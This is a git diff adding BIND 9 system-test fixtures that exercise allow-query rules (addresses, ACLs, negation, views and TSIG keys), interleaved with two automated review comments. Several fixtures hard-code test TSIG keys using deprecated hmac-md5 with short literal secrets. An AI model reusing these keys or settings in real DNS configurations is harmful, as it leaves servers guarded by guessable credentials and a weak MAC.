+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/allow-query/ns1/root.db b/bin/tests/system/allow-query/ns1/root.db
new file mode 100644
index 0000000..456198e
--- /dev/null
+++ b/bin/tests/system/allow-query/ns1/root.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ SOA a.root-servers.nil. hostmaster.localhost. 1 3600 1200 604800 3600
+ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+normal.example. NS ns2.normal.example.
+ns2.normal.example. A 10.53.0.2
diff --git a/bin/tests/system/allow-query/ns2/generic.db b/bin/tests/system/allow-query/ns2/generic.db
new file mode 100644
index 0000000..83e66f9
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/generic.db
@@ -0,0 +1,33 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN @
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.7.1
+mail A 10.0.7.2
+b A 10.0.7.3
+c A 10.0.7.4
+d A 10.0.7.5
+e A 10.0.7.6
+f A 10.0.7.7
+g A 10.0.7.8
+h A 10.0.7.9
diff --git a/bin/tests/system/allow-query/ns2/named01.conf.in b/bin/tests/system/allow-query/ns2/named01.conf.in
new file mode 100644
index 0000000..1f7ab40
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named01.conf.in
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "generic.db";
+};
diff --git a/bin/tests/system/allow-query/ns2/named02.conf.in b/bin/tests/system/allow-query/ns2/named02.conf.in
new file mode 100644
index 0000000..3e24bdc
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named02.conf.in
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { any; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named03.conf.in b/bin/tests/system/allow-query/ns2/named03.conf.in new file mode 100644 index 0000000..dd5985b --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named03.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { none; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named04.conf.in b/bin/tests/system/allow-query/ns2/named04.conf.in new file mode 100644 index 0000000..f61447e --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named04.conf.in 
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { 10.53.0.2; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named05.conf.in b/bin/tests/system/allow-query/ns2/named05.conf.in new file mode 100644 index 0000000..53c31a3 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named05.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { 10.53.0.1; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named06.conf.in b/bin/tests/system/allow-query/ns2/named06.conf.in new file mode 100644 index 0000000..49d9e42 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named06.conf.in 
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query {! 10.53.0.2; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named07.conf.in b/bin/tests/system/allow-query/ns2/named07.conf.in new file mode 100644 index 0000000..a40cade --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named07.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.2; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { accept; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named08.conf.in b/bin/tests/system/allow-query/ns2/named08.conf.in new file mode 100644 index 0000000..413878b --- /dev/null 
+++ b/bin/tests/system/allow-query/ns2/named08.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.1; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { accept; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named09.conf.in b/bin/tests/system/allow-query/ns2/named09.conf.in new file mode 100644 index 0000000..b2d900e --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named09.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.2; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query {! accept; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; 
diff --git a/bin/tests/system/allow-query/ns2/named10.conf.in b/bin/tests/system/allow-query/ns2/named10.conf.in
new file mode 100644
index 0000000..b91d19a
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named10.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query { key one; };
+};
+
+include "controls.conf";
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "generic.db";
+};
diff --git a/bin/tests/system/allow-query/ns2/named11.conf.in b/bin/tests/system/allow-query/ns2/named11.conf.in
new file mode 100644
index 0000000..308c4ca
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named11.conf.in
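Review bot: The `key one` block pins `algorithm hmac-md5;` with a short literal secret, and the same pattern recurs in named11.conf.in (keys `one` and `two`) and named12.conf.in. Since the fixture only needs some TSIG key to exercise `allow-query { key one; };`, `algorithm hmac-sha256;` would serve the same purpose without tying the test to a deprecated MAC, which may be unavailable where MD5 is disabled by crypto policy. The client side of the test is not visible in this hunk and would need the matching algorithm for the key it presents. A short comment above the key, for example `/* test-only TSIG key; not for use outside the system tests */`, would also keep the fixture from being mistaken for a usable sample.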
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+key two {
+ algorithm hmac-md5;
+ secret "1234efgh8765";
+};
+
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query { key one; };
+};
+
+include "controls.conf";
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "generic.db";
+};
diff --git a/bin/tests/system/allow-query/ns2/named12.conf.in b/bin/tests/system/allow-query/ns2/named12.conf.in
new file mode 100644
index 0000000..6b0fe55
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named12.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query {! key one; };
+};
+
+include "controls.conf";
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "generic.db";
+};
diff --git a/bin/tests/system/allow-query/ns2/named21.conf.in b/bin/tests/system/allow-query/ns2/named21.conf.in
new file mode 100644
index 0000000..311eaf7
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named21.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named22.conf.in b/bin/tests/system/allow-query/ns2/named22.conf.in
new file mode 100644
index 0000000..1c191da
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named22.conf.in
@@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { any; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; + +}; diff --git a/bin/tests/system/allow-query/ns2/named23.conf.in b/bin/tests/system/allow-query/ns2/named23.conf.in new file mode 100644 index 0000000..e0cd069 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named23.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { none; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named24.conf.in b/bin/tests/system/allow-query/ns2/named24.conf.in new file mode 100644 index 0000000..33f03b0 --- /dev/null 
+++ b/bin/tests/system/allow-query/ns2/named24.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { 10.53.0.2; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named25.conf.in b/bin/tests/system/allow-query/ns2/named25.conf.in new file mode 100644 index 0000000..28cadd0 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named25.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { 10.53.0.1; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; 
diff --git a/bin/tests/system/allow-query/ns2/named26.conf.in b/bin/tests/system/allow-query/ns2/named26.conf.in new file mode 100644 index 0000000..52b915d --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named26.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query {! 10.53.0.2; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named27.conf.in b/bin/tests/system/allow-query/ns2/named27.conf.in new file mode 100644 index 0000000..c95838c --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named27.conf.in 
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl accept { 10.53.0.2; };
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { accept; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+
+};
diff --git a/bin/tests/system/allow-query/ns2/named28.conf.in b/bin/tests/system/allow-query/ns2/named28.conf.in
new file mode 100644
index 0000000..06d9b91
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named28.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl accept { 10.53.0.1; };
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { accept; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named29.conf.in b/bin/tests/system/allow-query/ns2/named29.conf.in
new file mode 100644
index 0000000..acd1b41
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named29.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl accept { 10.53.0.2; };
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query {! accept; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named30.conf.in b/bin/tests/system/allow-query/ns2/named30.conf.in
new file mode 100644
index 0000000..aefc474
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named30.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { key one; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named31.conf.in b/bin/tests/system/allow-query/ns2/named31.conf.in
new file mode 100644
index 0000000..27eccc2
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named31.conf.in
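Review bot: The TSIG key `one` in ns2/named30.conf.in is declared with `algorithm hmac-md5;`, and the same choice recurs in named31.conf.in, named32.conf.in and named40.conf.in, while the ns3 fixtures in this commit already use `hmac-sha256` for `rndc_key`. HMAC-MD5 is not available on builds where MD5 is disabled, so these access-control cases would probably not load there, and the key-based allow/deny paths would go untested. Consider `algorithm hmac-sha256;` for both keys and, in tests.sh, naming the algorithm explicitly as `-y hmac-sha256:one:1234abcd8765` (likewise for key `two`), so that client and server do not depend on dig's default.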
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+key two {
+ algorithm hmac-md5;
+ secret "1234efgh8765";
+};
+
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query { key one; };
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { key one; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named32.conf.in b/bin/tests/system/allow-query/ns2/named32.conf.in
new file mode 100644
index 0000000..adbb203
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named32.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query {! key one; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named33.conf.in b/bin/tests/system/allow-query/ns2/named33.conf.in
new file mode 100644
index 0000000..be1e160
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named33.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query { none; };
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { any; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+
+};
diff --git a/bin/tests/system/allow-query/ns2/named34.conf.in b/bin/tests/system/allow-query/ns2/named34.conf.in
new file mode 100644
index 0000000..d35ac3e
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named34.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query { any; };
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { none; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named40.conf.in b/bin/tests/system/allow-query/ns2/named40.conf.in
new file mode 100644
index 0000000..364f94b
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named40.conf.in
@@ -0,0 +1,107 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
